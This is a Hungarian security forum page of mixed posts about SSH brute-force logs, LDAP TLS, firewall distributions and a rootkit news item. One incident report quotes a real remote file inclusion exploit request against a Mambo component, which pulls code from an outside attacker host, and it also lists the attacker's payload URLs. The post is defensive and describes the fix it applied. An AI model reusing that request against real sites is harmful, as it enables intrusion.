Security-all

Sziasztok!

nézegettem egy kicsit a logokat a Debian serveremen és a következőre lettem figyelmes az auth.log-ban:

Aug 14 12:09:08 localhost sshd[22815]: Did not receive identification string from 219.148.119.105
Aug 14 12:12:22 localhost sshd[22818]: User root not allowed because not listed in AllowUsers
Aug 14 12:12:29 localhost sshd[22820]: Illegal user admin from 219.148.119.105
Aug 14 12:12:37 localhost sshd[22822]: Illegal user test from 219.148.119.105
Aug 14 12:12:41 localhost sshd[22824]: Illegal user guest from 219.148.119.105
Aug 14 12:12:45 localhost sshd[22826]: Illegal user webmaster from 219.148.119.105
Aug 14 12:12:51 localhost sshd[22828]: User mysql not allowed because not listed in AllowUsers
Aug 14 12:12:55 localhost sshd[22830]: Illegal user oracle from 219.148.119.105
Aug 14 12:13:01 localhost sshd[22832]: Illegal user library from 219.148.119.105
Aug 14 12:13:06 localhost sshd[22834]: Illegal user info from 219.148.119.105
Aug 14 12:13:10 localhost sshd[22836]: Illegal user shell from 219.148.119.105
Aug 14 12:13:14 localhost sshd[22838]: Illegal user linux from 219.148.119.105

kezdő linuxos admin vagyok, és nem vagyok teljesen tisztában azzal, hogy mit is jelent ez, de ha jól gondolom akkor egy kinai hacker próbálkozott. Honnan tudom, hogy sikerült-e neki? Vagy pontosan mit jelentenek ezek a bejegyzések?

A segítséget előre is köszönöm.
VS

Szombaton nemkivanatos processt talaltunk a webserverunkon. Ma volt idom utana nezni, hogy hogy is kerulhetett be, es hogy mit csinalt, mivel ugyis osszegyujtottem, gondoltam bepostolom ide, hatha valakinek tanulsagara lehet.

A tunetek: 99% procit evo ismeretlen perl process, nap kozben 70 mbit forgalom, 4 ismeretlen kapcsolat kifele. A tores egy mambo sebezhetosegen keresztul tortent, remote file inclusion alapu tamadas volt, rootot nem szerzett a cracker, csak az apacs felhasznalojanak neveben futtatta a scriptjet, ami felcsatlakozott egy irc szerverre, ahonnan varta az utasitasokat, mellesleg pedig mas sebezhetosegeket keresett mas gepeken. (amennyire jol vettem ki)

Itt van tehat, hogy hogy csinalta:

Ezzel jott be:

Request: 212.91.164.212 - - [12/Aug/2006:06:10:20 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
http://elitemorgan.com/mass.dat? HTTP/1.1" 200 16608

a sebezhetoseg leirasa:
http://www.elitemorgan.com/vuln/comprofiler-11-08-2006.txt

az oldaluk:
http://www.elitemorgan.com

a beincludeolt php:
http://elitemorgan.com/mass.dat?

a futtatott script:
http://www.elitemorgan.com/own

Workaroundkent mod_securityben letiltottam a mosConfig_absulote... kerest, a felhasznalot ertesitettuk a dologrol, es felszolitottuk, hogy javitsa a portaljat. Emellett meg kene egy grsecurity + rsbac a hasonlo dolgok elkerulesere, de ez perpill nem fog megtortenni.

Udv, onyx

fontos biztonsági kérdés a mac cím hamísítás. Ha az ellenség ismeri az eszközöket, de a védekező nem akkor a harc reménytelen. Szóval aki ismer ilyen prg-t az adjon linket, vagy irja a prg nevét.

Sziasztok!
Ha már muszály valami miatt Windows-t használni, akkor érdemes itt is open source progikat előnyben részesíteni.
Sajnos a ClamWin honlapja szerint:

"Please note that ClamWin Free Antivirus does not include an on-access real-time scanner. You need to manually scan a file in order to detect a virus or spyware."

Ennek ellenére találtam egy ingyenes progit, ami integrálja a real-time shield-be a ClamWin-t, így már növelhető a biztonság.
Itt a link és teljesen freeware:
http://www.spywareterminator.com/
Bye
marcus

http://www.linux.hu

"Welcome to Your New Home in Cyberspace!"

Egy Linux hostrol kapcsolodom egy w2k active directory-hoz, prima. De senki sem szereti, ha egy jelszo clear-ben megy at, ezert be akartam izzitani a TLS-t.

A w2k-n van certificate authority, ott kiexportaltam a certificate-et, atvittem a linux gepre, ahol az ldap.conf-ban szerepel a "TLS_REQCERT allow" sor, de csak azert se hajlando TLS-en at kommunikalni az ldapsearch es az AD.

Sikerult mar valakinek osszeloni ezeket? Ha igen, megosztana a titkot? Elore is Megathx...

Hello! Egy nagyon jó tűzfal disztribúcióra lenne szükségem.
A lényeg a webes beállító felület és a stabilitás.
(Egy kis irodában folyó munka védelmére szolgál, mindent tiltani kell kintről, kivétel a mailt és az ssh-t...)
Néztem eddig SmoothWall-t, IpCop-ot.
Van tapasztalatotok ezekkel kapcsolatban vagy tudtok ajánlani valami megbízható fw disztrót?
A segítséget előre is köszönöm!

"[eWeek/HWSW] Egy szingapúri biztonsági szakértő laboratóriumi körülmények között olyan rootkitet hozott létre, amely még a legbiztonságosabb operációs rendszeren is felderíthetetlen marad. Az AMD Pacifica kódnevű virtualizációs technológiáját kihasználva Joanna Rutkowska állítása szerint akármilyen operációs rendszer "alá", a virtualizációs hypervisor rétegbe tetszőleges kódot képes eljuttatni."

Nem tudom mennyire igaz, de érdekes cikk. Megvallom, nem gondoltam bele az elméleti működésébe, de figyelemfelkeltő, szó mi szó...

Forrás: HWSW.hu

Az Apeh Windows only Bevallasi rendszere:

serti a szemelyi szabadsag jogokat
diszkriminativ szoftwerhasznalat alapjan
adatbiztonsagi kerdeseket tucatjait veti fel

1. Windows vasarlasra kotelez akkor is ha mas rendszert alkalmazok
2. Szamitogep vasarlasra kotelez, valamint windows vasarlasra kotelez
3. Publikus szamitogep hasznalatara kotelez bizalmas adatok kezelese kapcsan (spyware warning)
4. Nem vallal felelosseget az alatala adott klinens programra
5. Nincs support
6. Nem nyilt forraskodu
7. Ellenkezik szamos ceg magasabb szintu biztonsagtechnikai kovetelmenyeivel a metodus.

Haha!

http://experts.microsoft.fr/default.aspx